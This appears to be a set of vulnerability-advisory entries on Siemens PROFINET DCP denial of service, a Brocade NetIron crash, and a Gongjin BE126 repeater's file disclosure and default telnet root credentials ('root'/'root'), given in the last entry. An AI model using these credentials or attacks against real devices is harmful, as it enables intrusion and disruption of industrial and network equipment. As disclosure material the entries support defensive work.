Specially crafted PROFINET DCP broadcast packets could cause a denial of service condition of affected products on a local Ethernet segment (Layer 2). Human interaction is required to recover the systems. PROFIBUS interfaces are not affected. SIMATIC CP, SIMATIC RF600, SCALANCE W700, etc. are all industrial automation products from Siemens AG. A denial of service vulnerability exists in several industrial devices from Siemens. Multiple Siemens Products is prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause a denial-of-service condition. Manual restart of the server is required to resume normal operation. SIEMENS SIMATIC CP 343-1 Std, CP 343-1 Lean (All versions), SIMATIC CP 343-1 Adv (All versions), SIMATIC CP 443-1 Std, CP 443-1 Adv (All versions before V3.2.17), SIMATIC CP 443-1 OPC-UA (All versions), SIMATIC CP 1243-1 (All versions before V2.1.82), SIMATIC CP 1243-1 IRC (All versions before V2.1.82), SIMATIC CP 1243-1 IEC (All versions), SIMATIC CP 1243-1 DNP3 (All versions), SIMATIC CM 1542-1 (All versions before V2.0), SIMATIC CP 1542SP-1, CP 1542SP-1 IRC, and CP 1543SP-1 (All versions before to V1.0.15), SIMATIC CP 1543-1 (All versions before V2.1), SIMATIC RF650R, RF680R, RF685R (All versions before V3.0), SIMATIC CP 1616, CP 1604, DK-16xx PN IO (All versions before V2.7), SCALANCE X-200 (All versions before V5.2.2), SCALANCE X200 IRT (All versions before V5.4.0), SCALANCE X-300/X408 (All versions before V4.1.0), SCALANCE X414 (All versions before V3.10.2), SCALANCE XM400, XR500 (All versions before V6.1), SCALANCE W700 (All versions before V6.1), SCALANCE M-800, S615 (All versions before V04.03), Softnet PROFINET IO for PC-based Windows systems (All versions before V14 SP1), IE/PB-Link (All versions before V3.0), IE/AS-i Link PN IO (All versions), SIMATIC Teleservice Adapter Standard Modem, IE Basic, IE Advanced (All versions), SITOP PSU8600 PROFINET (All versions before V1.2.0), SITOP UPS1600 PROFINET (All versions before V2.2.0), SIMATIC ET 200AL (All versions before V1.0.2), SIMATIC ET 200ecoPN (All versions), SIMATIC ET 200M (All versions), SIMATIC ET 200MP (All versions before V4.0.1), SIMATIC ET 200pro (All versions), SIMATIC ET 200S (All versions), SIMATIC ET 200SP (All versions before V4.1.0), SIMATIC PN/PN Coupler (All versions before V4.0), DK Standard Ethernet Controller (All versions before V4.1.1 Patch04), EK-ERTEC 200P PN IO (All versions before V4.4.0 Patch01), EK-ERTEC 200 PN IO (All versions before V4.2.1 Patch03), SIMATIC S7-200 SMART (All versions before V2.3), SIMATIC S7-300 incl. F and T (All versions before V3.X.14), SIMATIC S7-400 PN/DP V6 Incl. F (All versions before V6.0.6), SIMATIC S7-400-H V6 (All versions before V6.0.7), SIMATIC S7-400 PN/DP V7 incl. F (All versions), SIMATIC S7-CPU 410 (All versions before V8.2), SIMATIC S7-1200 incl. F (All versions before V4.2.1), SIMATIC S7-1500 incl. F, T, and TF (All versions before V2.1), SIMATIC S7-1500 Software Controller incl. F (All versions before V2.1), SIMATIC WinAC RTX 2010 incl. F (All versions), SIRIUS ACT 3SU1 interface module PROFINET (All versions), SIRIUS Soft starter 3RW44 PN (All versions), SIRIUS Motor starter M200D PROFINET (All versions), SIMOCODE pro V PROFINET (All versions), SINAMICS DCM (All versions before V1.4 SP1 HF5), SINAMICS DCP (All versions), SINAMICS G110M / G120(C/P/D) w. PN (All versions before V4.7 SP6 HF3), SINAMICS G130 and G150 (All versions before V4.7 HF27 and V4.8 before HF4), SINAMICS S110 w. PN (All versions before V4.4 SP1 HF5), SINAMICS S120 (All versions before V4.7 HF27 and V4.8 before HF4), SINAMICS S150 (All versions before V4.7 HF27 and V4.8 before HF4), SINAMICS V90 w. PN (All versions before V1.1), SIMOTION (All versions before V4.5 HF1), SINUMERIK 828D (All versions before V4.5 SP6 HF2 and V4.7 before SP6 HF8), SINUMERIK 840D sl (All versions before V4.5 SP6 HF8 and V4.7 before SP4 HF1), SIMATIC HMI Comfort Panels, HMI Multi Panels, HMI Mobile Panels (All versions) could be affected by a Denial-of-Service condition induced by a specially crafted PROFINET DCP broadcast (Layer 2 - Ethernet) packet. Siemens SIMATIC S7-200 Smart, etc. Siemens SIMATIC S7-200 Smart is a programmable logic controller (PLC) used in small and medium-sized automation systems. Siemens SIMATIC CP 343-1 Advanced is an Ethernet communication module used to support PROFINET (a new generation of automation bus standard based on industrial Ethernet technology). SIRIUS Motor starter M200D PROFINET is a motor starter. The following products and versions are affected: Siemens Extension Unit 12\" PROFINET prior to V01.01.01; Extension Unit 15\" PROFINET prior to V01.01.01; Extension Unit 19\" PROFINET prior to V01.01.01; Extension Unit 22\" PROFINET SIMATIC CP 1242-7 GPRS V2 prior to V2.1.82; SIMATIC CP 1243-7 LTE/US prior to V2.1.82; SIMATIC CP 1243-8 prior to V2.1.82; SIMATIC CP 1626 V1.1 previous version

Improper checks for unusual or exceptional conditions in Brocade NetIron 05.8.00 and later releases up to and including 06.1.00, when the Management Module is continuously scanned on port 22, may allow attackers to cause a denial of service (crash and reload) of the management module. Brocade NetIron OS is an operating system developed by Brocade Communications Systems (Brocade) in the United States that runs on switches and routers. A security vulnerability exists in Brocade NetIron versions 05.8.00 to 06.1.00. The vulnerability is caused by the program not properly detecting abnormal conditions

There is LFD (local file disclosure) on BE126 WIFI repeater 1.0 devices that allows attackers to read the entire filesystem on the device via a crafted getpage parameter. GongjinElectronicsBE126WIFIrepeater is a wireless Internet repeater from China's Gongjin Electronics. There is a security hole in the GongjinElectronicsBE126WIFIrepeater 1.0 version

On BE126 WIFI repeater 1.0 devices, an attacker can log into telnet (which is open by default) with default credentials as root (username:"root" password:"root") and can: 1. Read the entire file system; 2. Write to the file system; or 3. Execute any code that attacker desires (malicious or not). BE126 WIFI Repeater The device contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GongjinElectronicsBE126WIFIrepeater is a wireless Internet repeater from China's Gongjin Electronics. There is a security hole in the GongjinElectronicsBE126WIFIrepeater 1.0 version